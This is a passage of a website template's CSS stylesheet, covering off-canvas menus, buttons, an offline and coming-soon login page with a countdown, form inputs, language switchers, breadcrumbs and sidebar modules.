.full-screen .offcanvas-menu .accordion-menu .separator > a:hover,
.full-screen-ftop .offcanvas-menu .accordion-menu .separator > a:hover {
  background: transparent !important;
}
.full-screen .offcanvas-menu .accordion-menu li a,
.full-screen-ftop .offcanvas-menu .accordion-menu li a {
  font-size: 170%;
  line-height: 2;
  padding: 20px;
  margin: 5px 0 !important;
}
.full-screen .offcanvas-menu .accordion-menu li .accordion-menu-toggler,
.full-screen-ftop .offcanvas-menu .accordion-menu li .accordion-menu-toggler {
  top: 0;
  display: block;
  margin-top: -7px;
}
.full-screen .offcanvas-menu .accordion-menu li ul li a,
.full-screen-ftop .offcanvas-menu .accordion-menu li ul li a {
  font-size: 16px !important;
  padding: 0 !important;
}
.full-screen .offcanvas-menu .accordion-menu li ul li .accordion-menu-toggler,
.full-screen-ftop .offcanvas-menu .accordion-menu li ul li .accordion-menu-toggler {
  padding: 6px 10px;
  margin-top: 3px;
}
.full-screen .offcanvas-menu .accordion-menu li ul li:last-child,
.full-screen-ftop .offcanvas-menu .accordion-menu li ul li:last-child {
  margin: 0 auto 20px;
}
.full-screen .offcanvas-menu .accordion-menu li ul li.parent > a,
.full-screen-ftop .offcanvas-menu .accordion-menu li ul li.parent > a {
  font-size: 19px !important;
}
.new-look-off-canvas .offcanvas-overlay {
  visibility: visible;
  opacity: 1;
}
.new-look-off-canvas.ltr .offcanvas-menu {
  visibility: visible;
  right: 0;
  -webkit-transform: translateX(0);
  transform: translateX(0);
}
@-moz-document url-prefix() {
  .offcanvas-menu {
    right: -320px;
    transform: translateX(0px);
  }
}
@media (max-width: 992px) {
  #offcanvas-toggler {
    position: relative;
    z-index: 10;
  }
  #offcanvas-toggler >i {
    padding: 0;
    font-size: 28px;
    text-align: center;
    width: 90px;
  }
  header.centered.dark #sp-menu .centered #offcanvas-toggler {
    display: block;
  }
  header.centered.dark #sp-menu .centered #offcanvas-toggler >i {
    display: block;
    padding: 0 50px;
    font-size: 32px;
    background: transparent;
    margin: 0 auto;
  }
  header.addspace #sp-menu .centered #offcanvas-toggler {
    margin: 0 auto;
    display: inline-block;
  }
  header.addspace #sp-menu .centered #offcanvas-toggler >i {
    display: inline-block;
    margin: 0 auto;
  }
  header.addspace #offcanvas-toggler {
    margin-right: 0px;
  }
}
a {
  -webkit-transition: color 200ms, background-color 350ms;
  transition: color 200ms, background-color 350ms;
}
* {
  -webkit-font-smoothing: subpixel-antialiased;
  -webkit-text-stroke: 1px transparent;
}
body {
  line-height: 25px;
}
a,
a:hover,
a:focus,
a:active {
  text-decoration: none;
  outline: 0;
}
a,
button,
input,
.btn,
.sppb-btn {
  outline: 0 !important;
}
label {
  font-weight: normal;
}
legend {
  padding-bottom: 10px;
}
img {
  display: block;
  max-width: 100%;
  height: auto;
}
.floatcenter {
  margin-left: auto;
  margin-right: auto;
  text-align: center;
}
.full-window {
  min-height: 100vh;
  position: absolute;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
}
.sticky-bottom {
  position: absolute;
  left: 0;
  right: 0;
  bottom: 0;
  z-index: 1;
}
.btn,
.sppb-btn-rounded {
  border-radius: 4px;
}
.sppb-btn {
  font-size: 100%;
  line-height: 1.4;
}
.btn,
.sppb-btn {
  -webkit-transition: color 400ms, background-color 400ms, border-color 400ms;
  -moz-transition: color 400ms, background-color 400ms, border-color 400ms;
  -o-transition: color 400ms, background-color 400ms, border-color 400ms;
  transition: color 400ms, background-color 400ms, border-color 400ms;
  padding: 8px 28px;
  margin-right: 3px;
  border: 1px solid transparent;
  outline: 0;
}
.btn.sppb-btn-outline,
.sppb-btn.sppb-btn-outline {
  padding: 8px 30px;
}
.btn.sppb-btn-round,
.sppb-btn.sppb-btn-round {
  line-height: 1.5;
  padding: 8px 26px 9px;
}
.btn.sppb-btn-3d,
.sppb-btn.sppb-btn-3d {
  padding: 10px 30px 11px;
  -webkit-box-shadow: inset 0 -4px 0 rgba(0,0,0,0.25), inset 0 0 0 1px rgba(0,0,0,0.1);
  box-shadow: inset 0 -4px 0 rgba(0,0,0,0.25), inset 0 0 0 1px rgba(0,0,0,0.1);
  outline: 0;
  border: 0;
  -webkit-transform: translateY(0) scale(1) perspective(1000px) rotateX(5deg) rotateY(0) translateZ(1%);
  -moz-transform: translateY(0) scale(1) perspective(1000px) rotateX(5deg);
  -ms-transform: translateY(0) scale(1) perspective(1000px) rotateX(5deg);
  -o-transform: translateY(0) scale(1) perspective(1000px) rotateX(5deg);
  transform: translateY(0) scale(1) perspective(1000px) rotateX(5deg) rotateY(0) translateZ(1%);
  -webkit-transition: all 0.1s ease;
  -moz-transition: all 0.1s ease;
  -o-transition: all 0.1s ease;
  transition: all 0.1s ease;
}
.btn.sppb-btn-3d.focus,
.btn.sppb-btn-3d.active,
.btn.sppb-btn-3d:active,
.btn.sppb-btn-3d:focus,
.sppb-btn.sppb-btn-3d.focus,
.sppb-btn.sppb-btn-3d.active,
.sppb-btn.sppb-btn-3d:active,
.sppb-btn.sppb-btn-3d:focus {
  outline: 0;
  border: 0;
  -webkit-box-shadow: inset 0 -2px 0 rgba(0,0,0,0.25), inset 0 1px 0 rgba(0,0,0,0.1), inset 0 0 0 1px rgba(0,0,0,0.1);
  box-shadow: inset 0 -2px 0 rgba(0,0,0,0.25), inset 0 1px 0 rgba(0,0,0,0.1), inset 0 0 0 1px rgba(0,0,0,0.1);
  -webkit-transform: translateY(1px) scale(0.99) perspective(800px) rotateX(-5deg);
  -moz-transform: translateY(1px) scale(0.99) perspective(800px) rotateX(-5deg);
  -ms-transform: translateY(1px) scale(0.99) perspective(800px) rotateX(-5deg);
  -o-transform: translateY(1px) scale(0.99) perspective(800px) rotateX(-5deg);
  transform: translateY(1px) scale(0.99) perspective(800px) rotateX(0);
}
.btn.sppb-btn-3d.sppb-btn-lg,
.sppb-btn.sppb-btn-3d.sppb-btn-lg {
  padding: 10px 34px 13px;
}
.btn.sppb-selector i.fa,
.btn.sppb-modal-selector i.fa,
.sppb-btn.sppb-selector i.fa,
.sppb-btn.sppb-modal-selector i.fa {
  margin: 0 5px 0 0;
}
.btn.sppb-selector i.fas,
.btn.sppb-selector i.far,
.btn.sppb-modal-selector i.fas,
.btn.sppb-modal-selector i.far,
.sppb-btn.sppb-selector i.fas,
.sppb-btn.sppb-selector i.far,
.sppb-btn.sppb-modal-selector i.fas,
.sppb-btn.sppb-modal-selector i.far {
  margin: 0 5px 0 0;
}
.btn.sppb-selector i.pe,
.btn.sppb-modal-selector i.pe,
.sppb-btn.sppb-selector i.pe,
.sppb-btn.sppb-modal-selector i.pe {
  margin: 0 7px 0 -2px;
  line-height: 1.1;
  font-size: 115%;
  text-align: center;
  vertical-align: middle;
}
.btn.bold i.pe,
.sppb-btn.bold i.pe {
  font-weight: 600;
}
.btn.sppb-btn-xs,
.sppb-btn.sppb-btn-xs {
  line-height: 1.1;
  padding: 5px 16px;
  font-size: 80%;
}
.btn.sppb-btn-sm,
.sppb-btn.sppb-btn-sm {
  padding: 6px 22px;
  font-size: 87%;
}
.btn.sppb-btn-lg,
.sppb-btn.sppb-btn-lg {
  line-height: 1.7;
  font-size: 125%;
  padding: 9px 30px;
}
.btn.btn-light i,
.sppb-btn.btn-light i {
  line-height: 1.3;
  margin-right: 6px;
}
.btn.btn-light i.pe,
.sppb-btn.btn-light i.pe {
  font-size: 130%;
  vertical-align: middle;
  line-height: 1.4;
  margin-right: 7px;
}
.btn.btn-light i.pe.bold,
.sppb-btn.btn-light i.pe.bold {
  font-weight: 600;
}
.btn.responsive,
.sppb-btn.responsive {
  white-space: normal;
  text-align: center;
  display: table;
}
.btn.sppb-btn-link,
.sppb-btn.sppb-btn-link {
  border: 0;
  padding-left: 20px;
  padding-right: 20px;
}
.btn-readmore {
  margin: 10px auto;
  padding: 8px 30px;
}
.button {
  outline: none;
  border-radius: 4px;
  border: none;
  margin: 20px 10px;
}
.offline-container .row-fluid {
  display: -webkit-box;
  display: -moz-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -webkit-align-items: center;
  -ms-flex-align: center;
  -ms-align-items: center;
  align-items: center;
  -webkit-box-pack: center;
  -webkit-justify-content: center;
  -ms-justify-content: center;
  justify-content: center;
  height: 100vh;
}
.offline-container .row-fluid > div {
  -webkit-box-align: center;
  -webkit-align-items: center;
  -ms-flex-align: center;
  -ms-align-items: center;
  align-items: center;
  -webkit-box-pack: center;
  -webkit-justify-content: center;
  -ms-justify-content: center;
  justify-content: center;
}
.offline-inner {
  background: rgba(255,255,255,0.8);
  margin: 0 auto;
  padding: 3%;
  border-radius: 4px;
}
.offline-inner .offline_message {
  display: -webkit-box;
  display: -moz-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -webkit-align-items: center;
  -ms-flex-align: center;
  -ms-align-items: center;
  align-items: center;
  -webkit-box-pack: center;
  -webkit-justify-content: center;
  -ms-justify-content: center;
  justify-content: center;
  margin: 10px auto;
  padding: 3vh;
}
.offline-inner .outline > .centered-logo {
  display: -webkit-box;
  display: -moz-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -webkit-align-items: center;
  -ms-flex-align: center;
  -ms-align-items: center;
  align-items: center;
  -webkit-box-pack: center;
  -webkit-justify-content: center;
  -ms-justify-content: center;
  justify-content: center;
  margin: 0 auto;
}
.offline-inner .outline h1 {
  font-weight: 300;
  color: #777;
  text-shadow: 1px 1px 2px gba(255,255,255,0.85);
}
.offline-inner .outline #form-login {
  display: table;
  margin: 10px auto 20px;
  text-align: center;
  width: 320px;
}
.offline-inner .outline #form-login #submit-buton {
  margin: 0;
  text-align: left;
}
.offline-inner .outline #form-login #submit-buton .btn-readmore.login {
  border-color: #f03f29;
  background-color: #f14833;
  background-color: rgba(241,72,51,0.9);
  color: #fff;
}
.offline-inner .outline #form-login #submit-buton .btn-readmore.login:hover,
.offline-inner .outline #form-login #submit-buton .btn-readmore.login:focus {
  border-color: #ca230e;
  background-color: #f03720;
  color: #fff;
}
.offline-inner .outline #form-login > div {
  margin: 10px auto;
}
.offline-inner .outline #form-login input.form-control {
  background-color: rgba(255,255,255,0.85);
  line-height: 32px;
  height: 42px;
}
.offline-inner hr {
  border-color: rgba(255,255,255,0.8);
  box-shadow: 0 -1px 0px rgba(0,0,0,0.1);
  margin-bottom: 25px;
}
.offline-inner .sp-comingsoon-content {
  margin: 10px auto;
  clear: both;
  font-size: 26px;
  font-weight: 300;
  display: block;
  width: 100%;
  text-align: center;
}
.offline-inner .sp-comingsoon-countdown {
  display: -webkit-box;
  display: -moz-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -webkit-align-items: center;
  -ms-flex-align: center;
  -ms-align-items: center;
  align-items: center;
  -webkit-box-pack: center;
  -webkit-justify-content: center;
  -ms-justify-content: center;
  justify-content: center;
  padding: 0 10%;
}
.offline-inner .sp-comingsoon-countdown .days,
.offline-inner .sp-comingsoon-countdown .hours,
.offline-inner .sp-comingsoon-countdown .minutes,
.offline-inner .sp-comingsoon-countdown .seconds {
  width: 22%;
  background-color: rgba(30,30,30,0.1);
  margin: 10px auto;
  box-shadow: none;
  padding: 10px;
  border-radius: 3px;
}
.offline-inner .sp-comingsoon-countdown .days .number,
.offline-inner .sp-comingsoon-countdown .hours .number,
.offline-inner .sp-comingsoon-countdown .seconds .number,
.offline-inner .sp-comingsoon-countdown .minutes .number {
  min-width: 50%;
  height: 45px;
  line-height: 45px;
  display: table;
  margin: 10px auto;
  text-align: center;
  font-size: 45px;
  font-weight: 300;
}
.offline-inner .sp-comingsoon-countdown .days .string,
.offline-inner .sp-comingsoon-countdown .minutes .string,
.offline-inner .sp-comingsoon-countdown .seconds .string,
.offline-inner .sp-comingsoon-countdown .hours .string {
  display: -webkit-box;
  display: -moz-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -webkit-align-items: center;
  -ms-flex-align: center;
  -ms-align-items: center;
  align-items: center;
  -webkit-box-pack: center;
  -webkit-justify-content: center;
  -ms-justify-content: center;
  justify-content: center;
  font-size: 16px;
  color: #777;
  margin: 10px auto 5px;
}
select,
textarea,
input[type="text"],
input[type="password"],
input[type="datetime"],
input[type="datetime-local"],
input[type="date"],
input[type="month"],
input[type="time"],
input[type="week"],
input[type="number"],
input[type="email"],
input[type="url"],
input[type="search"],
input[type="tel"],
input[type="color"],
.uneditable-input {
  display: block;
  height: 34px;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.428571429;
  color: #555555;
  background-color: #fff;
  background-image: none;
  border: 1px solid #ccc;
  border-radius: 4px;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
  box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
  -webkit-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  -moz-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
}
select:focus,
textarea:focus,
input[type="text"]:focus,
input[type="password"]:focus,
input[type="datetime"]:focus,
input[type="datetime-local"]:focus,
input[type="date"]:focus,
input[type="month"]:focus,
input[type="time"]:focus,
input[type="week"]:focus,
input[type="number"]:focus,
input[type="email"]:focus,
input[type="url"]:focus,
input[type="search"]:focus,
input[type="tel"]:focus,
input[type="color"]:focus,
.uneditable-input:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102,175,233,0.6);
  box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102,175,233,0.6);
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.uneditable-input::-moz-placeholder {
  color: #999;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.uneditable-input:-ms-input-placeholder {
  color: #999;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.uneditable-input::-webkit-input-placeholder {
  color: #999;
}
select[disabled],
select[readonly],
fieldset[disabled] select,
textarea[disabled],
textarea[readonly],
fieldset[disabled] textarea,
input[type="text"][disabled],
input[type="text"][readonly],
fieldset[disabled] input[type="text"],
input[type="password"][disabled],
input[type="password"][readonly],
fieldset[disabled] input[type="password"],
input[type="datetime"][disabled],
input[type="datetime"][readonly],
fieldset[disabled] input[type="datetime"],
input[type="datetime-local"][disabled],
input[type="datetime-local"][readonly],
fieldset[disabled] input[type="datetime-local"],
input[type="date"][disabled],
input[type="date"][readonly],
fieldset[disabled] input[type="date"],
input[type="month"][disabled],
input[type="month"][readonly],
fieldset[disabled] input[type="month"],
input[type="time"][disabled],
input[type="time"][readonly],
fieldset[disabled] input[type="time"],
input[type="week"][disabled],
input[type="week"][readonly],
fieldset[disabled] input[type="week"],
input[type="number"][disabled],
input[type="number"][readonly],
fieldset[disabled] input[type="number"],
input[type="email"][disabled],
input[type="email"][readonly],
fieldset[disabled] input[type="email"],
input[type="url"][disabled],
input[type="url"][readonly],
fieldset[disabled] input[type="url"],
input[type="search"][disabled],
input[type="search"][readonly],
fieldset[disabled] input[type="search"],
input[type="tel"][disabled],
input[type="tel"][readonly],
fieldset[disabled] input[type="tel"],
input[type="color"][disabled],
input[type="color"][readonly],
fieldset[disabled] input[type="color"],
.uneditable-input[disabled],
.uneditable-input[readonly],
fieldset[disabled] .uneditable-input {
  cursor: not-allowed;
  background-color: #eeeeee;
  opacity: 1;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.uneditable-input {
  height: auto;
}
.group-control select,
.group-control textarea,
.group-control input[type="text"],
.group-control input[type="password"],
.group-control input[type="datetime"],
.group-control input[type="datetime-local"],
.group-control input[type="date"],
.group-control input[type="month"],
.group-control input[type="time"],
.group-control input[type="week"],
.group-control input[type="number"],
.group-control input[type="email"],
.group-control input[type="url"],
.group-control input[type="search"],
.group-control input[type="tel"],
.group-control input[type="color"],
.group-control .uneditable-input {
  width: 100%;
}
input {
  transition: all .3s ease-in-out;
  -webkit-transition: all .3s ease-in-out;
  -moz-transition: all .3s ease-in-out;
  -o-transition: all .3s ease-in-out;
}
input:focus {
  box-shadow: none !important;
}
.group-control select,
.group-control textarea,
.group-control input[type="text"],
.group-control input[type="password"],
.group-control input[type="datetime"],
.group-control input[type="datetime-local"],
.group-control input[type="date"],
.group-control input[type="month"],
.group-control input[type="time"],
.group-control input[type="week"],
.group-control input[type="number"],
.group-control input[type="email"],
.group-control input[type="url"],
.group-control input[type="search"],
.group-control input[type="tel"],
.group-control input[type="color"],
.group-control .uneditable-input {
  width: 100%;
}
.pull-left {
  margin-right: 20px;
  margin-bottom: 3px;
}
.pull-center {
  margin: 0 auto 10px;
  text-align: center;
}
.pull-right {
  margin-left: 20px;
  margin-bottom: 3px;
}
.float-left {
  float: left;
}
.float-center {
  float: none;
  margin: 0 auto;
  text-align: center;
}
.float-right {
  float: right;
}
.svgwhite {
  background: url(../images/svgwhite.svg) center center repeat;
}
.shadow {
  box-shadow: -25px 0 30px -15px rgba(0,0,0,0.15), 25px 0 30px -15px rgba(0,0,0,0.15);
}
.text-shadow {
  text-shadow: 1px 1px 2px rgba(0,0,0,0.2);
}
.text-shadow .sppb-cta-title {
  text-shadow: 1px 1px 2px rgba(0,0,0,0.2);
}
.border-radius {
  border-radius: 5px;
}
.padding30 {
  padding: 0 30px;
}
#sp-top-bar .sp-module {
  display: inline-block;
  margin-top: 0;
  margin-bottom: 0;
}
#sp-top-bar .sp-module .modal-login-wrapper {
  display: inline-block;
}
ul.social-icons {
  list-style: none;
  padding: 0;
  margin: 0;
  display: inline-block;
}
ul.social-icons >li {
  display: inline-block;
  margin: 0 7px;
}
ul.social-icons >li a {
  color: #999999;
}
.sp-module-content .mod-languages .dropdown-toggle {
  display: block;
  padding: 3px 10px 3px 14px;
  broder: none;
  box-shadow: 1px 0 0 0px rgba(196,196,196,0.15), -1px 0 0 0px rgba(196,196,196,0.15);
  line-height: 1;
}
.sp-module-content .mod-languages .dropdown-toggle img {
  display: inline-block;
  padding: 0 7px 0 0;
  margin-top: -2px;
}
.sp-module-content .mod-languages .dropdown-toggle >i {
  padding: 0 0 0 4px;
  width: 16px;
  line-height: 14px;
  vertical-align: middle;
}
.sp-module-content .mod-languages .dropdown-menu {
  background-color: rgba(60,60,60,0.87);
  border-radius: 0 0 5px 5px;
  margin-top: 9px;
}
.sp-module-content .mod-languages .dropdown-menu li {
  box-shadow: none;
  border: none;
}
.sp-module-content .mod-languages .dropdown-menu li a {
  padding: 2px 14px;
  display: -webkit-box;
  display: -moz-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -webkit-align-items: center;
  -ms-flex-align: center;
  -ms-align-items: center;
  align-items: center;
  box-shadow: none;
  border: none;
  border-bottom: 1px solid rgba(157,157,157,0.25);
}
.sp-module-content .mod-languages .dropdown-menu li a img {
  vertical-align: middle;
  float: left;
  display: flex;
  padding: 0 8px 0 0;
}
.sp-module-content .mod-languages .dropdown-menu li a:hover {
  color: #fff;
  background-color: rgba(0,0,0,0.1);
}
.sp-module-content .mod-languages .dropdown-menu li:last-child a {
  border-bottom: none;
}
.sp-module-content .mod-languages ul.lang-inline {
  margin: 0;
  padding: 0 10px;
  border-left: 1px solid rgba(129,129,129,0.4);
  border-right: 1px solid rgba(129,129,129,0.4);
}
.sp-module-content .mod-languages ul.lang-inline li {
  border: none;
  display: inline-block;
  margin: 0 5px 0 0;
}
.sp-module-content .mod-languages ul.lang-inline li a {
  padding: 0 !important;
}
.sp-module-content .mod-languages ul.lang-inline li >a:before {
  display: none;
}
.sp-module-content .mod-languages ul.lang-inline li:last-child {
  margin-right: 0;
}
.sp-module-content .mod-languages ul.lang-block.vertical {
  margin: 0;
  padding: 0;
  display: block;
}
.sp-module-content .mod-languages ul.lang-block.vertical li {
  border: none;
  margin: 8px 0 0 0;
  padding: 0;
  display: table;
  text-align: left;
}
.sp-module-content .mod-languages ul.lang-block.vertical li a {
  float: left;
  display: block;
  padding: 0;
  line-height: 1.5;
}
.sp-module-content .mod-languages ul.lang-block.vertical li a img {
  float: left;
  direction: ltr;
  text-align: left;
  display: inline;
  margin: 0;
  padding: 4px 8px 0 0;
}
.sp-module-content .mod-languages ul.lang-block.vertical li a span {
  font-size: 90%;
  float: left;
}
.sp-module-content .mod-languages ul.lang-block.vertical li.lang-active a i {
  padding: 0px 0 0 6px;
  margin-top: 3px;
  line-height: 15px;
  font-size: 80%;
  color: #f89e92;
  vertical-align: top;
  opacity: 0.7;
}
.sp-module-content .mod-languages ul.lang-block.vertical li >a:before {
  display: none;
}
.signature {
  position: relative;
  overflow: auto;
  width: 100%;
  height: 0;
  padding-bottom: 55.30973%;
}
.signature svg {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
}
.sp-contact-info {
  float: left;
  list-style: none;
  padding: 0;
  margin: 0 10px 0 0;
}
.sp-contact-info li {
  display: inline-block;
  margin: 0 7px;
  font-size: 90%;
}
.sp-contact-info li i {
  margin: 0 3px;
}
.sp-contact-info li i.pe {
  font-size: 125%;
  line-height: 1;
  margin-top: -2px;
  vertical-align: middle;
}
.sp-contact-info li span[id*="cloak"] {
  text-indent: -9999em;
}
#sp-logo-centered #sp-logo,
#sp-logo-centered #sp-logo div h1,
#sp-logo-centered #sp-logo div a {
  display: -webkit-box;
  display: -moz-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -webkit-align-items: center;
  -ms-flex-align: center;
  -ms-align-items: center;
  align-items: center;
  -webkit-box-pack: center;
  -webkit-justify-content: center;
  -ms-justify-content: center;
  justify-content: center;
  margin: 0 auto;
  padding: 0;
}
#sp-addspace-logo .sp-column,
#sp-addspace-logo #sp-addspace div {
  display: -webkit-box;
  display: -moz-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -webkit-align-items: center;
  -ms-flex-align: center;
  -ms-align-items: center;
  align-items: center;
}
#sp-addspace-logo #sp-logo > div {
  display: -webkit-box;
  display: -moz-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -webkit-align-items: center;
  -ms-flex-align: center;
  -ms-align-items: center;
  align-items: center;
}
ol.breadcrumb {
  background: transparent;
  padding: 0;
  margin-: 0;
  list-style: none;
  border-radius: 4px;
}
ol.breadcrumb > li {
  display: inline;
}
ol.breadcrumb > li + li:before,
ol.breadcrumb > li img {
  display: none;
}
ol.breadcrumb > li .text_separator {
  padding: 0 5px;
  display: inline;
}
ol.breadcrumb > li .breadcrumb_divider {
  padding: 0 6px;
  vertical-align: middle;
  color: #ccc;
}
#sp-title {
  min-height: 0;
}
.sp-page-title-no-img {
  background-color: #999;
}
.sp-page-title,
.sp-page-title-no-img {
  display: -webkit-box;
  display: -moz-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -webkit-align-items: center;
  -ms-flex-align: center;
  -ms-align-items: center;
  align-items: center;
  background-repeat: no-repeat;
  background-position: 50% 50%;
  background-size: cover;
  background-attachment: fixed;
  box-shadow: inset 0 -10px 40px -10px rgba(0,0,0,0.1), inset 0 10px 10px -8px rgba(0,0,0,0.2);
  backface-visibility: hidden;
}
.sp-page-title .container h1,
.sp-page-title-no-img .container h1 {
  font-weight: 300;
}
.sp-page-title .container h1,
.sp-page-title .container h2,
.sp-page-title .container h3,
.sp-page-title-no-img .container h1,
.sp-page-title-no-img .container h2,
.sp-page-title-no-img .container h3 {
  margin: 0;
  padding: 0;
  color: #fff;
  text-shadow: 1px 2px 5px rgba(0,0,0,0.2);
}
.sp-page-title .container h1,
.sp-page-title .container h2,
.sp-page-title-no-img .container h1,
.sp-page-title-no-img .container h2 {
  font-size: 32px;
  line-height: 1;
}
.sp-page-title .container h3,
.sp-page-title-no-img .container h3 {
  font-size: 14px;
  font-weight: normal;
  line-height: 1;
  margin-top: 10px;
}
.sp-page-title .container .breadcrumb,
.sp-page-title-no-img .container .breadcrumb {
  background: none;
  padding: 0;
  margin: 10px 0 0 0;
}
.sp-page-title .container .breadcrumb >.active,
.sp-page-title-no-img .container .breadcrumb >.active {
  color: rgba(255,255,255,0.8);
}
.sp-page-title .container .breadcrumb >span,
.sp-page-title .container .breadcrumb >li,
.sp-page-title .container .breadcrumb >li+li:before,
.sp-page-title .container .breadcrumb >li>a,
.sp-page-title-no-img .container .breadcrumb >span,
.sp-page-title-no-img .container .breadcrumb >li,
.sp-page-title-no-img .container .breadcrumb >li+li:before,
.sp-page-title-no-img .container .breadcrumb >li>a {
  color: #fff;
}
.body-innerwrapper {
  overflow-x: hidden;
}
.layout-boxed .body-innerwrapper {
  max-width: 1170px;
  margin-left: auto;
  margin-right: auto;
}
.layout-boxed .body-innerwrapper header.centered,
.layout-boxed .body-innerwrapper header.centered > .container-fluid {
  width: 100%;
}
.layout-boxed .body-innerwrapper .sp-page-title {
  padding-left: 20px;
}
.layout-boxed .body-innerwrapper #sp-left.container-fluid,
.layout-boxed .body-innerwrapper #sp-right.container-fluid {
  padding: 0 15px 0 15px !important;
}
.layout-boxed .no-padding {
  padding-left: 0;
  padding-right: 0;
}
#sp-main-body {
  padding: 50px 0;
}
.com-sppagebuilder #sp-main-body {
  padding: 0;
}
.com-sppagebuilder #sp-main-body .sppb-section {
  backface-visibility: hidden;
}
.com-sppagebuilder #sp-main-body .sppb-section > .sppb-row {
  padding: 0;
}
.com-sppagebuilder #sp-main-body .sppb-section > .sppb-row .sppb-addon-container {
  padding: 0;
}
.com-sppagebuilder #sp-main-body #sp-left {
  padding: 0 0 0 40px;
  margin-right: -15px;
}
.com-sppagebuilder #sp-main-body #sp-right {
  padding: 0 40px 0 0;
  margin-left: -15px;
}
.sp-column .sp-lr .sp-module {
  margin-top: 40px;
}
.sp-column .sp-lr .sp-module:first-child {
  margin-top: 0;
}
.sp-module:first-child,
.sppb-addon-module:first-child {
  margin-top: 0;
}
.sp-module .sp-module-title,
.sppb-addon-module .sp-module-title {
  margin: 0 0 20px;
  font-size: 140%;
  line-height: 1.2;
  width: auto;
  padding-right: 30px;
  box-shadow: inset 0 -1px 0 #ddd;
  display: table;
}
.sp-module .sp-module-title:after,
.sppb-addon-module .sp-module-title:after {
  clear: both;
  display: block;
  float: left;
  content: "";
  position: relative;
  height: 2px;
  width: 70%;
  margin: 10px 30% 0 0;
  border-radius: 2px;
  padding: 0;
}
.sp-module ul,
.sppb-addon-module ul {
  list-style: none;
  padding: 0;
  margin: 0;
}
.sp-module ul >li,
.sppb-addon-module ul >li {
  display: block;
  border-bottom: 1px solid #e8e8e8;
  -webkit-transition: 300ms;
  transition: 300ms;
}
.sp-module ul >li >a,
.sppb-addon-module ul >li >a {
  display: block;
  padding: 5px 0;
  line-height: 36px;
  padding: 2px 0;
  -webkit-transition: 300ms;
  transition: 300ms;
}
.sp-module ul >li >a:hover,
.sppb-addon-module ul >li >a:hover {
  background: none;
}
.sp-module ul >li:last-child,
.sppb-addon-module ul >li:last-child {
  border-bottom: none;
}
.sp-module .categories-module ul,
.sppb-addon-module .categories-module ul {
  margin: 0 10px;
}
.sp-module ul.category-module >li,
.sppb-addon-module ul.category-module >li {
  padding-bottom: 10px;
  margin-bottom: 7px;
}
.sp-module ul.category-module >li a.mod-articles-category-title,
.sppb-addon-module ul.category-module >li a.mod-articles-category-title {
  line-height: 1.5;
}
.sp-module ul.category-module >li a.mod-articles-category-title >i,
.sppb-addon-module ul.category-module >li a.mod-articles-category-title >i {
  font-size: 87%;
  opacity: 0;
  margin-left: -2px;
